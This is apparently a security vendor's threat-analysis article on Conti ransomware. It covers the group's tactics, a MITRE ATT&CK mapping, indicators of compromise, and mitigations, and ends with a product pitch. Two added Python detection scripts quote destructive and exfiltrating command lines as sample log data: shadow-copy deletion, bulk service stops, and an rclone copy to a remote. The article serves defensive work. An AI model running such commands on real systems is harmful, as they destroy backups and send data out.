In this article, we discuss Conti ransomware in detail. We present our analysis results and the group's tactics, techniques, and procedures (TTPs), and look at some interesting facts about the vulnerabilities exploited in Conti ransomware attacks.
Conti is a ransomware-as-a-service (RaaS) operation believed to be controlled by a Russian cybercrime group called WizardSpider. The ransomware shares some code with the infamous Ryuk ransomware, which was last reported in July 2020. Conti gains initial access to a network through malicious attachments and links, encrypts data, and spreads to other systems exceptionally quickly, which makes it a particularly dangerous threat. Cybercriminals typically run a Conti attack by stealing files, encrypting servers and workstations, and demanding a ransom payment. Conti was considered one of the most successful ransomware gangs of 2021 and remains one of the most prolific today, especially since REvil members were arrested at the beginning of 2022. According to the Ransomware project, Conti is a highly prolific threat actor that has obtained more than $50 million.
Since 2020, Conti has consistently made headlines. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) issued a joint advisory warning organizations about the threat posed by the ransomware group and the vulnerabilities it exploits. According to the advisory FBI Flash: Conti Ransomware Attacks Impact Healthcare and First Responder Networks, Conti ransomware has been used in more than 400 attacks against U.S. and international organizations. A typical Conti attack involves malicious cyber actors stealing files, encrypting servers and workstations, and demanding ransom payments to restore access to those files.
According to the advisory, CISA, FBI, and the National Security Agency (NSA) recommend implementing mitigation measures such as multifactor authentication (MFA), network segmentation, and updating operating systems & software to mitigate the Conti ransomware.
Conti continued its prolific track record in 2022, with four attacks reported within the first two months of the year. The following are a few recent incidents involving the Conti group.
Recently Conti pledged loyalty to the government of Russia
During the Russia – Ukraine war in 2022, the Conti ransomware gang pledged its allegiance to the Russian government. It warned that it would retaliate against the critical infrastructure of any nation that launched cyberattacks against Russia in response to the war.
Tactics, Techniques, and Procedures
The group uses phishing emails aimed at an organization's staff to install the TrickBot, IcedID, Cobalt Strike, and BazarLoader trojans and gain remote access to the compromised machines. Conti actors abuse legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks. Based on our analysis of multiple attacks involving Conti ransomware, we believe the following sequence represents their overall strategy:
- Phishing and spear-phishing campaigns
- Exploit vulnerable external assets such as firewalls
- Abuse Internet-facing RDP (Remote Desktop Protocol) servers
- Scan internal servers, endpoints, backups, and sensitive data
- Gather live IP addresses and open ports using popular port scanners such as Angry IP Scanner, Advanced Port Scanner, or RouterScan to compile a list of IP addresses
- Use RDP and remote monitoring software to maintain persistence
- Install backdoors such as BazarLoader and create processes and registry entries to maintain persistence
- Use tools such as Mimikatz to escalate privileges and obtain Domain Administrator privileges or equivalent
- Disable security controls so that they can move laterally around the network without being noticed
- Dump credentials using popular post-exploitation tools such as Mimikatz and Windows Sysinternals
- Use RCE (remote code execution) vulnerabilities to distribute the ransomware to all identified servers
- Inject into logon scripts and batch scripts that loop over the list of IP addresses, delivered through GPO, so the code is deployed to as many servers as possible whenever a computer starts up and joins the domain
Command and Control
- Four Cobalt Strike server Internet Protocol (IP) addresses were used by Conti for communication with their C2 infrastructure
- Exfiltrate as much data as possible using a variety of methods. The files can be saved on the actors' own server, transmitted through email, or uploaded to one or more anonymous cloud storage containers.
- Use the Rclone tool for data exfiltration
CONTI TTP – MITRE ATT&CK Mapping
According to CISA, the following is the mapping of Conti TTPs to the MITRE ATT&CK matrix:
| Technique | Observed Conti behavior |
| --- | --- |
|  | Conti actors have been observed gaining unauthorized access to victim networks through stolen Remote Desktop Protocol (RDP) credentials. |
| Phishing: Spearphishing Attachment | Conti ransomware can be delivered using TrickBot malware, which is known to use an email with an Excel sheet containing a malicious macro to deploy the malware. |
| Phishing: Spearphishing Link | Conti ransomware can be delivered using TrickBot, which has been delivered via malicious links in phishing emails. |
| Command and Scripting Interpreter: Windows Command Shell | Conti ransomware can utilize command line options to allow an attacker control over how it scans and encrypts files. |
| Native Application Programming Interface (API) | Conti ransomware has used API calls during execution. |
|  | Conti actors have been observed gaining unauthorized access to victim networks through stolen RDP credentials. |
| External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as virtual private networks (VPNs), Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally. |
| Process Injection: Dynamic-link Library Injection | Conti ransomware has loaded an encrypted dynamic-link library (DLL) into memory and then executes it. |
| Obfuscated Files or Information | Conti ransomware has encrypted DLLs and used obfuscation to hide Windows API calls. |
| Process Injection: Dynamic-link Library Injection | Conti ransomware has loaded an encrypted DLL into memory and then executes it. |
| Deobfuscate/Decode Files or Information | Conti ransomware has decrypted its payload using a hardcoded AES-256 key. |
|  | Conti actors use legitimate tools to maliciously scan for and brute force routers, cameras, and network-attached storage devices with web interfaces. |
| Steal or Forge Kerberos Tickets: Kerberoasting | Conti actors use Kerberos attacks to attempt to get the Admin hash. |
| System Network Configuration Discovery | Conti ransomware can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and checking to ensure the IP addresses it connects to are for local, non-internet systems. |
| System Network Connections Discovery | Conti ransomware can enumerate routine network connections from a compromised host. |
|  | Conti ransomware can enumerate through all open processes to search for any that have the string SQL in their process name. |
| File and Directory Discovery | Conti ransomware can discover files on a local system. |
| Network Share Discovery | Conti ransomware can enumerate remote open Server Message Block (SMB) network shares using NetShareEnum(). |
| Remote Services: SMB/Windows Admin Shares | Conti ransomware can spread via SMB and encrypts files on different hosts, potentially compromising an entire network. |
| Taint Shared Content | Conti ransomware can spread itself by infecting other remote machines via network shared drives. |
| Data Encrypted for Impact | Conti ransomware can use CreateIoCompletionPort(), PostQueuedCompletionStatus(), and GetQueuedCompletionPort() to rapidly encrypt files, excluding those with the extensions .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RSA-4096 public encryption key that is unique for each victim. Conti ransomware can use "Windows Restart Manager" to ensure files are unlocked and open for encryption. |
|  | Conti ransomware can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop. |
| Inhibit System Recovery | Conti ransomware can delete Windows Volume Shadow Copies using vssadmin. |
Table 2: Conti ATT&CK techniques for enterprise
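Several rows in the table above describe behaviour that is loud in process-creation telemetry: shadow copies deleted with vssadmin, a burst of "net stop" commands against backup, database, and email services, and Rclone used for exfiltration (see the Command and Control section). The following Python script is an added example, not code from the original article or from NetSecurity, that runs those three detections over a handful of constructed Sysmon-style process-creation lines. The key=value line layout, the host names, the service names, and the burst threshold of five stops within sixty seconds are all assumptions chosen for the example.

```python
"""Flag Conti-style impact and exfiltration behaviour in process-creation logs.

Added example. Assumed input: one event per line in a simple key=value layout
modelled on Sysmon Event ID 1 (process creation). The sample lines below are
constructed for this example and are not real telemetry.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample telemetry: one harmless "net stop" on WS01, then a
# shadow-copy deletion, a burst of service stops and an rclone run on SRV02.
SAMPLE_LOG = r"""
2022-03-01T10:00:01 host=WS01 user=CORP\alice image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c dir"
2022-03-01T10:01:30 host=WS01 user=CORP\alice image=C:\Windows\System32\net.exe cmdline="net stop Spooler"
2022-03-01T10:02:11 host=SRV02 user=CORP\svc_backup image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
2022-03-01T10:02:15 host=SRV02 user=CORP\svc_backup image=C:\Windows\System32\net.exe cmdline="net stop MSSQLSERVER /y"
2022-03-01T10:02:16 host=SRV02 user=CORP\svc_backup image=C:\Windows\System32\net.exe cmdline="net stop SQLWriter /y"
2022-03-01T10:02:17 host=SRV02 user=CORP\svc_backup image=C:\Windows\System32\net.exe cmdline="net stop MSExchangeIS /y"
2022-03-01T10:02:18 host=SRV02 user=CORP\svc_backup image=C:\Windows\System32\net.exe cmdline="net stop VeeamBackupSvc /y"
2022-03-01T10:02:19 host=SRV02 user=CORP\svc_backup image=C:\Windows\System32\net.exe cmdline="net stop vss /y"
2022-03-01T10:03:40 host=SRV02 user=CORP\svc_backup image=C:\Users\Public\rclone.exe cmdline="rclone.exe copy D:\Shares\Finance remote:staging"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>[^"]*)"\s*$'
)
# "vssadmin delete shadows ..." is the Inhibit System Recovery row of the table.
SHADOW_DELETE_RE = re.compile(r"\bdelete\s+shadows\b", re.IGNORECASE)
# "net stop <service>" (net.exe hands off to net1.exe, so accept both).
NET_STOP_RE = re.compile(r"^\s*net1?(?:\.exe)?\s+stop\b", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not fit."""
    match = LINE_RE.match(line)
    if not match:
        return None
    event = match.groupdict()
    event["ts"] = datetime.fromisoformat(event["ts"])
    event["basename"] = event["image"].rsplit("\\", 1)[-1].lower()
    return event


def _alert(rule, event, detail):
    return {"rule": rule, "host": event["host"], "user": event["user"],
            "ts": event["ts"], "detail": detail}


def detect(log_text, burst_threshold=5, window=timedelta(seconds=60)):
    """Return alerts in log order: shadow-copy deletion, service-stop bursts, rclone."""
    alerts = []
    net_stop_times = defaultdict(deque)  # host -> timestamps of recent "net stop"
    burst_alerted = set()                # alert once per host, not once per stop
    for raw in log_text.splitlines():
        event = parse_line(raw)
        if event is None:
            continue
        base, cmd = event["basename"], event["cmdline"]
        if base == "vssadmin.exe" and SHADOW_DELETE_RE.search(cmd):
            alerts.append(_alert("shadow_copy_deletion", event, cmd))
        if base in ("net.exe", "net1.exe") and NET_STOP_RE.search(cmd):
            recent = net_stop_times[event["host"]]
            recent.append(event["ts"])
            while recent and event["ts"] - recent[0] > window:
                recent.popleft()  # slide the window forward
            if len(recent) >= burst_threshold and event["host"] not in burst_alerted:
                burst_alerted.add(event["host"])
                alerts.append(_alert("service_stop_burst", event,
                                     f"{len(recent)} 'net stop' commands within "
                                     f"{int(window.total_seconds())}s"))
        if base == "rclone.exe":
            alerts.append(_alert("rclone_execution", event, cmd))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['ts'].isoformat()} {alert['host']} {alert['rule']}: {alert['detail']}")
```

The single "net stop Spooler" on WS01 stays below the burst threshold and produces no alert, which is the point of counting stops per host inside a sliding window rather than alerting on every service stop: an administrator restarting one service looks nothing like a pre-encryption sweep across backup, database, and email services.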
How does Conti Work?
When executed, it encrypts files and appends the extension [.]ODMUA to their names. It leaves a ransom note in the form of a text file named "readme.txt."
Indicators of Compromise
Encrypted Files Extension
Ransom Demand Message
Cyber Criminal Contact
- C:\documents and settings\conti_readme[.]txt
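The two file-level indicators given above, the [.]ODMUA extension and the readme.txt / conti_readme.txt note names, are easy to sweep for during incident scoping. The following Python script is an added example, not code from the original article or from NetSecurity. It walks a directory tree, collects files carrying the extension, collects ransom notes, and flags directories where at least half the files are encrypted, which helps separate a genuinely affected share from a stray file. The sample tree it builds in a temporary directory, the directory names, and the 50% threshold are assumptions made for the example.

```python
"""Sweep a directory tree for Conti file-level indicators of compromise.

Added example. Looks for the [.]ODMUA extension and the readme.txt /
conti_readme.txt ransom-note names from the article. The sample tree is
constructed in a temporary directory; nothing here touches real data.
"""
import os
import shutil
import tempfile
from pathlib import Path

ENCRYPTED_EXT = ".odmua"  # compared case-insensitively
RANSOM_NOTE_NAMES = frozenset({"readme.txt", "conti_readme.txt"})

# Constructed sample layout: "finance" is mostly encrypted, "hr" has one
# encrypted file beside a note, "public" is untouched.
SAMPLE_TREE = {
    "finance": ["q1_report.xlsx.ODMUA", "budget.docx.ODMUA", "conti_readme.txt"],
    "hr": ["policy.pdf.ODMUA", "readme.txt", "team_photo.jpg"],
    "public": ["notice.txt", "logo.png"],
}


def sweep(root, encrypted_ext=ENCRYPTED_EXT, note_names=RANSOM_NOTE_NAMES, min_ratio=0.5):
    """Return encrypted files, ransom notes, and directories mostly encrypted.

    A directory is reported as affected when the share of files carrying the
    encrypted extension is at least min_ratio (notes count toward the total).
    """
    encrypted, notes, affected = [], [], []
    for dirpath, _subdirs, filenames in os.walk(root):
        hits = 0
        for name in filenames:
            path = Path(dirpath) / name
            if name.lower() in note_names:
                notes.append(path)
            elif path.suffix.lower() == encrypted_ext:
                encrypted.append(path)
                hits += 1
        if filenames and hits / len(filenames) >= min_ratio:
            affected.append(Path(dirpath))
    return {
        "encrypted_files": sorted(encrypted),
        "ransom_notes": sorted(notes),
        "affected_dirs": sorted(affected),
    }


def build_sample_tree():
    """Create the constructed sample tree in a temp dir and return its root."""
    root = Path(tempfile.mkdtemp(prefix="conti_sweep_"))
    for subdir, names in SAMPLE_TREE.items():
        (root / subdir).mkdir()
        for name in names:
            (root / subdir / name).write_bytes(b"constructed sample content")
    return root


def remove_sample_tree(root):
    """Delete the temp tree created by build_sample_tree()."""
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        result = sweep(sample_root)
        print(f"encrypted files: {len(result['encrypted_files'])}")
        print(f"ransom notes:    {len(result['ransom_notes'])}")
        for directory in result["affected_dirs"]:
            print(f"affected dir:    {directory.relative_to(sample_root)}")
    finally:
        remove_sample_tree(sample_root)
```

On a real engagement the sweep would be pointed at the file servers and network shares named in the Lateral Movement rows of the ATT&CK table, since Conti spreads through SMB shares; the per-directory ratio is what turns a list of file paths into a map of which shares were actually reached.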
How to Safeguard Against CONTI?
Staying safe from data breaches is possible with the proper knowledge, practices, and reliable solutions. Prevent initial access at all costs. The following are basic mitigations:
- An efficient and effective threat intelligence pipeline to stay updated on adversary TTPs
- Patch your operating system (OS), software, and firmware as soon as vendors release essential updates.
- Proper segregation and isolation of internal networks.
- Update passwords for network systems and accounts regularly. An effective password policy that addresses password complexity and rotation is vital.
- Deploy properly configured NGFW/IDPS/XDR/EDR systems to monitor and thwart malicious activity.
- Disable any ports that are not needed for remote access/Remote Desktop Protocol (RDP).
- A proper system monitoring pipeline with comprehensive logging, including PowerShell and JScript activity.
- Employee education is equally important: staff should avoid reusing the same password across multiple accounts and should use multi-factor authentication.
- Cybersecurity education is vital. The best means of preventing such incidents is cybersecurity education.
- Suspicious emails should be avoided.
- Do not open attachments or click on links if you receive such an email.
- Double-check that an email is legitimate, especially if it urges you to make a financial transaction.
- Effective, redundant, and fail-proof backup plans.
- Use multi-factor authentication whenever possible.
How To Detect Ongoing Ransomware Attacks?
Cyber security threats and ransomware attacks are increasing at a tremendous pace. It is extremely difficult for cyber security analysts and incident responders to investigate and detect these threats using conventional tools and techniques. NetSecurity's ThreatResponder, with its diverse capabilities, can help your team detect the most advanced cyber threats, including APTs, zero-day attacks, and ransomware attacks. It can also help automate incident response actions across millions of endpoints, making response easy, fast, and hassle-free.
Want to see ThreatResponder, our cutting-edge Endpoint Detection & Response (EDR) security solution, in action? Click the button below to request a free demo of NetSecurity's ThreatResponder platform.
The page’s content shall be deemed proprietary and privileged information of NETSECURITY CORPORATION. It shall be noted that NETSECURITY CORPORATION copyrights the contents of this page. Any violation/misuse/unauthorized use of this content “as is” or “modified” shall be considered illegal and subjected to articles and provisions that have been stipulated in the General Data Protection Regulation (GDPR) and Personal Data Protection Law (PDPL).